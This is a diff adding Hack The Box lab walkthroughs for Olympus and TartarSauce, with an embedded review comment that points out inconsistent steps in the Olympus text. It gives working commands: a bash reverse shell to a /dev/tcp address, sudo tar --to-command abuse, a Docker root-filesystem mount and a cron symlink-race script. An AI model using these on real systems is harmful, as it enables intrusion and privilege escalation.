+ | 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
+ | 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
+ |_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port2222-TCP:V=7.80%I=7%D=3/18%Time=5E71EB4D%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,29,"SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
+ SF:20\x20\x20\x20\x20\x20\x20\x20\r\n");
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
+
+
+
+And here we see another port opened with SSH on it ! So we try to login as the user we guessed was icarus with his password : Too_cl0se_to_th3_Sun
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ssh -p 2222 icarus@10.10.10.83
+ The authenticity of host '[10.10.10.83]:2222 ([10.10.10.83]:2222)' can't be established.
+ ECDSA key fingerprint is SHA256:uyZtmsYFq/Ac58+SEgLsL+NK05LlH2qwp2EXB1DxlO4.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[10.10.10.83]:2222' (ECDSA) to the list of known hosts.
+ icarus@10.10.10.83's password:
+
+ Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
+ icarus@620b296204a3:~$ id
+ uid=1000(icarus) gid=1000(icarus) groups=1000(icarus)
+ icarus@620b296204a3:~$ cat user.txt
+ cat: user.txt: No such file or directory
+ icarus@620b296204a3:~$ ls
+ help_of_the_gods.txt
+ icarus@620b296204a3:~$ cat help_of_the_gods.txt
+
+ Athena goddess will guide you through the dark...
+
+ Way to Rhodes...
+ ctfolympus.htb
+
+
+
+and we get a shell session as icarus ! Although we still need to find the user flag, being hinted yet again with a riddle about the Athena goddess and most importantly the domain name ctfolympus.htb so let's use dig just like before to enumerate this domainname:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig axfr @10.10.10.83 ctfolympus.htb
+
+ ; <<>> DiG 9.11.16-2-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
+ ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
+ ctfolympus.htb. 86400 IN A 192.168.0.120
+ ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
+ ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
+ ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
+ crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ mail.ctfolympus.htb. 86400 IN A 192.168.0.120
+ ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
+ ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
+ rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
+ www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
+ ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
+ ;; Query time: 76 msec
+ ;; SERVER: 10.10.10.83#53(10.10.10.83)
+ ;; WHEN: Wed Mar 18 09:39:57 GMT 2020
+ ;; XFR size: 15 records (messages 1, bytes 475)
+
+
+From here we see that we have quite a few of subdomains to work with, along with a riddle mentionning "Prometheus opening a portal to Hades (3456 8234 62431) and St34l_th3_F1re!" So maybe we have credentials, but before that let's list every subdomain we found before adding them to our /etc/hosts file:
+
+
+ echo '10.10.10.83 ctfolympus.htb'
+
+
+
+ crete.ctfolympus.htb
+ hades.ctfolympus.htb
+ mail.ctfolympus.htb
+ ns1.ctfolympus.htb
+ ns2.ctfolympus.htb
+ rhodes.ctfolympus.htb
+ RhodesColossus.ctfolympus.htb
+ www.ctfolympus.htb
+ ctfolympus.htb
+
+
+
+ echo '10.10.10.83 ctfolympus.htb'
+
+
+We try to ssh as the user prometheus with his assumed password St34l_th3_F1re :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ssh prometheus@10.10.10.83 -p2222
+ prometheus@10.10.10.83's password:
+ Permission denied, please try again.
+ prometheus@10.10.10.83's password:
+ Permission denied, please try again.
+ prometheus@10.10.10.83's password:
+ prometheus@10.10.10.83: Permission denied (publickey,password).
+
+
+
+ icarus@620b296204a3:~$ cat /etc/passwd | grep prometheus
+ icarus@620b296204a3:~$
+
+
+We can't ssh on port 2222 as the user prometheus, because he isn't even an user on the box, so assuming from the hades riddle, we can assume that it is about port knocking just like on the box [Nineveh](10.html):
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → for x in 3456 8234 62431 22; do nmap -Pn --max-retries 0 -p $x 10.10.10.83; done
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.065s latency).
+
+ PORT STATE SERVICE
+ 3456/tcp closed vat
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.062s latency).
+
+ PORT STATE SERVICE
+ 8234/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.060s latency).
+
+ PORT STATE SERVICE
+ 62431/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:52 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+
+ PORT STATE SERVICE
+ 22/tcp open ssh
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+
+
+And there we have it ! we have been able to open port 22 by knocking on the 3 aforementionned ports so let's try to ssh as the user prometheus:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → for x in 3456 8234 62431; do nmap -Pn --max-retries 0 -p $x 10.10.10.83; done ;sshpass -p 'St34l_th3_F1re!' ssh -oStrictHostKeyChecking=no prometheus@10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.065s latency).
+
+ PORT STATE SERVICE
+ 3456/tcp closed vat
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.064s latency).
+
+ PORT STATE SERVICE
+ 8234/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:55 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.070s latency).
+
+ PORT STATE SERVICE
+ 62431/tcp closed unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
+ Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
+
+ Welcome to
+
+ ) (
+ ( /( ) )\ ) (
+ )\()) ( /( (()/( ))\ (
+ ((_)\ )(_)) ((_))/((_))\
+ | |(_)((_)_ _| |(_)) ((_)
+ | ' \ / _` |/ _` |/ -_)(_-<
+ |_||_|\__,_|\__,_|\___|/__/
+
+ prometheus@olympus:~$ cat user.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we are on the box let's enumerate it a bit :
+
+
+ prometheus@olympus:~$ sudo -l
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for prometheus:
+ Sorry, user prometheus may not run sudo on olympus.
+ prometheus@olympus:~$ netstat -alvnp | grep LISTEN
+
+
+Doesn't seem that we can run sudo -l as usual so we try to see what's running on the machine by using ps -auxw
+
+
+ prometheus@olympus:~$ ps auxw
+ USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
+ root 1 0.0 0.3 56992 6812 ? Ss Mar17 0:01 /sbin/init
+ [...]
+ root 276 0.0 0.2 51236 5540 ? Ss Mar17 0:00 /lib/systemd/systemd-journald
+ root 279 0.0 0.5 207504 10556 ? Ssl Mar17 0:27 /usr/bin/vmtoolsd
+ root 280 0.0 0.0 0 0 ? S Mar17 0:00 [kauditd]
+ root 293 0.0 0.2 46828 5004 ? Ss Mar17 0:00 /lib/systemd/systemd-udevd
+ systemd+ 359 0.0 0.1 127284 4052 ? Ssl Mar17 0:02 /lib/systemd/systemd-timesyncd
+ root 365 0.0 0.0 0 0 ? S Mar17 0:00 [ttm_swap]
+ root 438 0.0 0.1 29664 2868 ? Ss Mar17 0:00 /usr/sbin/cron -f
+ root 439 0.0 0.1 35920 3292 ? Ss Mar17 0:01 /usr/sbin/irqbalance --foreground
+ root 440 0.0 0.9 153488 18532 ? Ss Mar17 0:00 /usr/bin/VGAuthService
+ message+ 441 0.0 0.1 45120 3724 ? Ss Mar17 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
+ root 456 0.0 0.1 250116 3304 ? Ssl Mar17 0:00 /usr/sbin/rsyslogd -n
+ root 457 0.0 0.2 46420 4804 ? Ss Mar17 0:00 /lib/systemd/systemd-logind
+ root 562 0.0 0.1 8572 3876 ? Ss Mar17 0:00 /usr/sbin/knockd -i enp0s3
+ root 565 0.1 3.1 585408 65468 ? Ssl Mar17 0:59 /usr/bin/dockerd -H fd://
+ root 570 0.0 0.0 14536 1780 tty1 Ss+ Mar17 0:00 /sbin/agetty --noclear tty1 linux
+ root 580 0.0 0.2 69944 5452 ? Ss Mar17 0:00 /usr/sbin/sshd -D
+ root 591 0.0 1.1 400308 23004 ? Ssl Mar17 0:41 docker-containerd --config /var/run/docker/containerd/containerd.toml
+ root 983 0.0 0.1 51488 3600 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 53 -container-ip 172.18.0.2 -container-port 53
+ root 989 0.0 0.1 51488 3708 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.20.0.2 -container-port 80
+ root 1004 0.0 0.2 206028 5704 ? Sl Mar17 0:03 /usr/bin/docker-proxy -proto udp -host-ip 0.0.0.0 -host-port 53 -container-ip 172.18.0.2 -container-port 53
+ root 1005 0.0 0.1 51488 3636 ? Sl Mar17 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 2222 -container-ip 172.19.0.2 -container-port 22
+ root 1018 0.0 0.1 7648 3836 ? Sl Mar17 0:02 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/f00ba96171c58d55c6
+ root 1022 0.0 0.1 7648 4036 ? Sl Mar17 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/ce2ecb56a96ee3d95d
+ root 1023 0.0 0.2 7648 4784 ? Sl Mar17 0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/620b296204a38a1bc2
+ systemd+ 1058 0.0 1.2 289576 24668 ? Ssl Mar17 0:17 /usr/sbin/named -g -c /etc/bind/named.conf -u bind
+ root 1067 0.0 0.9 175340 20136 ? Ss Mar17 0:02 apache2 -DFOREGROUND
+ root 1077 0.0 0.2 65504 6004 ? Ss Mar17 0:00 /usr/sbin/sshd -D
+ root 1756 0.0 0.0 0 0 ? S 01:02 0:00 [kworker/1:2]
+ root 1831 0.0 0.0 0 0 ? S 01:32 0:00 [kworker/0:0]
+ www-data 1832 0.0 0.6 175640 13272 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1834 0.0 0.6 175648 13276 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1851 0.0 0.6 175632 13264 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1865 0.0 0.6 175768 13424 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1871 0.0 0.6 175640 13272 ? S 01:36 0:00 apache2 -DFOREGROUND
+ www-data 1873 0.0 0.6 175640 13272 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1874 0.0 0.6 175768 13644 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1878 0.0 0.6 175768 13436 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1881 0.0 0.6 175632 13264 ? S 01:37 0:00 apache2 -DFOREGROUND
+ www-data 1888 0.0 0.6 175640 13272 ? S 01:37 0:00 apache2 -DFOREGROUND
+ root 1895 0.0 0.0 0 0 ? S 02:01 0:00 [kworker/1:1]
+ root 1949 0.0 0.3 90476 6588 ? Ss 02:36 0:00 sshd: icarus [priv]
+ prometh+ 1953 0.0 0.1 90476 3272 ? S 02:36 0:00 sshd: icarus@pts/0
+ prometh+ 1954 0.0 0.1 18240 3428 pts/0 Ss+ 02:36 0:00 -bash
+ root 1969 0.0 0.0 0 0 ? S 02:49 0:00 [kworker/0:1]
+ root 1976 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/0:2]
+ root 1985 0.0 0.3 99336 7108 ? Ss 02:55 0:00 sshd: prometheus [priv]
+ prometh+ 1987 0.0 0.3 65036 6176 ? Ss 02:55 0:00 /lib/systemd/systemd --user
+ prometh+ 1988 0.0 0.0 84576 1632 ? S 02:55 0:00 (sd-pam)
+ prometh+ 1993 0.0 0.1 99336 4020 ? S 02:55 0:00 sshd: prometheus@pts/0
+ prometh+ 1994 0.0 0.2 21192 4996 pts/0 Ss 02:55 0:00 -bash
+ prometh+ 2010 0.0 0.1 38304 3288 pts/0 R+ 02:58 0:00 ps auxw
+
+
+
+Here we are hinted towards docker running on the box, so let's enumerate it :
+
+
+ prometheus@olympus:~$ docker images
+ REPOSITORY TAG IMAGE ID CREATED SIZE
+ crete latest 31be8149528e 23 months ago 450MB
+ olympia latest 2b8904180780 23 months ago 209MB
+ rodhes latest 82fbfd61b8c1 23 months ago 215MB
+
+
+We know about crete, but we don't know about olympia yet so let's try to get a shell in it's docker image :
+
+
+ prometheus@olympus:~$ docker run --rm -i -t -v /:/hostOS olympia /bin/bash
+ root@72fd5d0030ac:/# uname -a
+ Linux 72fd5d0030ac 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 x86_64 x86_64 GNU/Linux
+ root@72fd5d0030ac:/# whoami
+ root
+ root@72fd5d0030ac:/# cat /root/root.txt
+ cat: /root/root.txt: No such file or directory
+
+
+
+And we have root access to this docker image ! however root.txt isn't where it should be so let's poke around a little further:
+
+
+ root@72fd5d0030ac:/# cd /
+ root@72fd5d0030ac:/# ls
+ bin boot dev etc home hostOS lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
+ root@72fd5d0030ac:/# cd hostOS
+ root@72fd5d0030ac:/hostOS# ls
+ bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
+ root@72fd5d0030ac:/hostOS# cd root
+ root@72fd5d0030ac:/hostOS/root# ls
+ root.txt
+ root@72fd5d0030ac:/hostOS/root# cat root.txt
+ abXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it ! we have been able to print the root flag that was oddly placed in the /hostOS/root/ directory.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
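Review bot: the closing remark that the root flag "was oddly placed in the /hostOS/root/ directory" misreads the result: `docker run --rm -i -t -v /:/hostOS olympia /bin/bash` bind-mounts the host's `/` at `/hostOS`, so `/hostOS/root/root.txt` is the host's own `/root/root.txt`, and the finding to record is that prometheus can drive the Docker daemon (which runs as root, per `/usr/bin/dockerd -H fd://` in the ps output), not that a file is misplaced. Two smaller logic points: `echo '10.10.10.83 ctfolympus.htb'` appears twice and, unlike the earlier `echo '10.10.10.83 olympus.htb' >> /etc/hosts`, has no redirect, so it only prints and none of the listed subdomains are ever added; and "And we get a password !" after the first aircrack-ng run refers to an ESSID (`Too_cl0se_to_th3_Sun`) while the cracked key is `flightoficarus`, yet the ssh step says icarus logged in with `Too_cl0se_to_th3_Sun` without the session echoing it, so say explicitly which value was accepted. Also worth a pass: the searchsploit entry reads `xdebug < 2.5.5` while the header shows 2.5.5, which deserves a sentence on why the module still applies; the nikto output, the python port of 44568.rb, the md5sum comparison of the transferred capture and the `netstat -alvnp | grep LISTEN` output are all referred to but absent (stripped images, with stray "`" lines left at "` _Terminal 2:_" and "` _Terminal 1:_"); and `ps -auxw` in the prose should read `ps auxw`, the command actually run.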
diff --git a/Medium/27.md b/Medium/27.md
new file mode 100644
index 0000000..505e88b
--- /dev/null
+++ b/Medium/27.md
@@ -0,0 +1,339 @@
+# TartarSauce Writeup
+
+
+
+## Introduction :
+
+TartarSauce is a Medium linux box released back in May 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.88
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 12:17 GMT
+ Nmap scan report for 10.10.10.88
+ Host is up (0.071s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80 10.10.10.88
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 12:17 GMT
+ Nmap scan report for 10.10.10.88
+ Host is up (0.073s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ | http-robots.txt: 5 disallowed entries
+ | /webservices/tar/tar/source/
+ | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
+ |_/webservices/developmental/ /webservices/phpmyadmin/
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Landing Page
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running httpd 2.4.18 with an interesting directory which is /webservices/ so let's dirsearch it:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.88/webservices/ -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_12-39-18.log
+
+ Target: http://10.10.10.88/webservices/
+
+ [12:39:18] Starting:
+ [12:39:52] 301 - 319B - /webservices/wp -> http://10.10.10.88/webservices/wp/
+
+ Task Completed
+
+
+
+And we found the directory /webservices/wp ! so let's use wpscan to enumerate the wordpress website :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → wpscan -ep --url http://10.10.10.88/webservices/wp
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.9
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
+ [+] Started: Wed Mar 18 12:41:15 2020
+
+ Interesting Finding(s):
+
+
+
+Running the aforementionned command, we are hinted towards a vulnerable plugin : Gwolle Guestbook <= 2.5.3 which, according to our WPScan is vulnerable to Cross Site Scripting. http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
+
+You can check out Gwolle Guestbook's WP plugin RFI vulnerability explanation [here](https://www.immuniweb.com/advisory/HTB23275). Basically, the vulnerability is located in gwolle's frontent captcha ajaxresponse.php, and more precisely in the abspath parameter, which basically is where the RFI vulnerability is. so we can trigger a reverse shell to our local port 9001 with a simple curl command.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Apocalyst/nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Enterprise/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Meow/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → cp /home/nihilist/_HTB/Meow/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → sudo python -m SimpleHTTPServer 80
+ [sudo] password for nihilist:
+ Serving HTTP on 0.0.0.0 port 80 ...
+
+
+` 
+
+And we get a reverse shell ! although we need to elevate our privileges to the onuma user, so let's poke around the box a bit, Our first reflex here is sudo -l as always:
+
+
+ www-data@TartarSauce:/$ sudo -l
+ sudo -l
+ Matching Defaults entries for www-data on TartarSauce:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User www-data may run the following commands on TartarSauce:
+ (onuma) NOPASSWD: /bin/tar
+
+
+And it looks like we are able to execute /bin/tar as onuma without any password! so we need to get a shell by using /bin/tar, One way of doing so is creating a textfile containing the following:
+
+
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.11/9002 0>&1
+
+
+Saving it as a bashscript, and then getting tar to execute it with the -cvf flags.
+
+
+ www-data@TartarSauce:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.11/9002 0>&1' > nihilist.sh
+
+ www-data@TartarSauce:/tmp$ tar -cvf nihilist.tar nihilist.sh
+ tar -cvf nihilist.tar nihilist.sh
+ nihilist.sh
+
+ www-data@TartarSauce:/tmp$ ls
+ ls
+ nihilist.sh
+ nihilist.tar
+ systemd-private-ae3f290ecd13426bbc3a0ef6fa0c5f2f-systemd-timesyncd.service-6eF29j
+ vmware-root
+
+
+Now that we have our nihilist.tar we use tar's --to-command flag which will execute our bashscript, and obviously we'll run tar as the user onuma:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+
+` _Terminal 2:_
+
+
+ www-data@TartarSauce:/tmp$ sudo -u onuma tar -xvf nihilist.tar --to-command /bin/bash
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/TarTarSauce]
+ → nc -lvnp 9002
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.88.
+ Ncat: Connection from 10.10.10.88:43532.
+ bash: cannot set terminal process group (1247): Inappropriate ioctl for device
+ bash: no job control in this shell
+ onuma@TartarSauce:/tmp$ whoami
+ whoami
+ onuma
+ onuma@TartarSauce:/tmp$ cat /home/onuma/user.txt
+ cat /home/onuma/user.txt
+ b2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we can use pspy to find about the cronjob script ran as root every 5 minutes /usr/sbin/backuperer
+
+
+ onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
+ cat /usr/sbin/backuperer
+ #!/bin/bash
+
+ #-------------------------------------------------------------------------------------
+ # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
+ # ONUMA Dev auto backup program
+ # This tool will keep our webapp backed up incase another skiddie defaces us again.
+ # We will be able to quickly restore from a backup in seconds ;P
+ #-------------------------------------------------------------------------------------
+
+ # Set Vars Here
+ basedir=/var/www/html
+ bkpdir=/var/backups
+ tmpdir=/var/tmp
+ testmsg=$bkpdir/onuma_backup_test.txt
+ errormsg=$bkpdir/onuma_backup_error.txt
+ tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
+ check=$tmpdir/check
+
+ # formatting
+ printbdr()
+ {
+ for n in $(seq 72);
+ do /usr/bin/printf $"-";
+ done
+ }
+ bdr=$(printbdr)
+
+ # Added a test file to let us see when the last backup was run
+ /usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
+
+ # Cleanup from last time.
+ /bin/rm -rf $tmpdir/.* $check
+
+ # Backup onuma website dev files.
+ /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
+
+ # Added delay to wait for backup to complete if large files get added.
+ /bin/sleep 30
+
+ # Test the backup integrity
+ integrity_chk()
+ {
+ /usr/bin/diff -r $basedir $check$basedir
+ }
+
+ /bin/mkdir $check
+ /bin/tar -zxvf $tmpfile -C $check
+ if [[ $(integrity_chk) ]]
+ then
+ # Report errors so the dev can investigate the issue.
+ /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
+ integrity_chk >> $errormsg
+ exit 2
+ else
+ # Clean up and save archive to the bkpdir.
+ /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
+ /bin/rm -rf $check .*
+ exit 0
+ fi
+
+
+To exploit this script we can unpack the archive during the sleep period, replacing one of the files with a link to /root/root.txt and re-archive it. When the script will run to check for differences, the result of the contents of both files will end up in the logs. So we'll use [0xdf](https://0xdf.gitlab.io/)'s awesome bashscript which does it for us automatically :
+
+
+ #!/bin/bash
+
+ # work out of shm
+ cd /dev/shm
+
+ # set both start and cur equal to any backup file if it's there
+ start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
+ cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
+
+ # loop until there's a change in cur
+ echo "Waiting for archive filename to change..."
+ while [ "$start" == "$cur" -o "$cur" == "" ] ; do
+ sleep 10;
+ cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
+ done
+
+ # Grab a copy of the archive
+ echo "File changed... copying here"
+ cp $cur .
+
+ # get filename
+ fn=$(echo $cur | cut -d'/' -f4)
+
+ # extract archive
+ tar -zxf $fn
+
+ # remove robots.txt and replace it with link to root.txt
+ rm var/www/html/robots.txt
+ ln -s /root/root.txt var/www/html/robots.txt
+
+ # remove old archive
+ rm $fn
+
+ # create new archive
+ tar czf $fn var
+
+ # put it back, and clean up
+ mv $fn $cur
+ rm $fn
+ rm -rf var
+
+ # wait for results
+ echo "Waiting for new logs..."
+ tail -f /var/backups/onuma_backup_error.txt
+
+
+That we can also transform into a one liner:
+
+
+ cd /dev/shm; start=$(find /var/tmp -maxdepth 1 -type f -name ".*"); cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); while [ "$start" == "$cur" -o "$cur" == "" ] ; do sleep 10; cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); done; echo "File changed... copying here"; cp $cur .; fn=$(echo $cur | cut -d'/' -f4); tar -zxf $fn; rm var/www/html/robots.txt; ln -s /root/root.txt var/www/html/robots.txt; rm $fn; tar czf $fn var; mv $fn $cur; rm $fn; rm -rf var
+
+
+We'll save the script locally, then use both python's SimpleHTTPServer with curl that is on the machine to execute the script without having to download it onto the box:
+
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
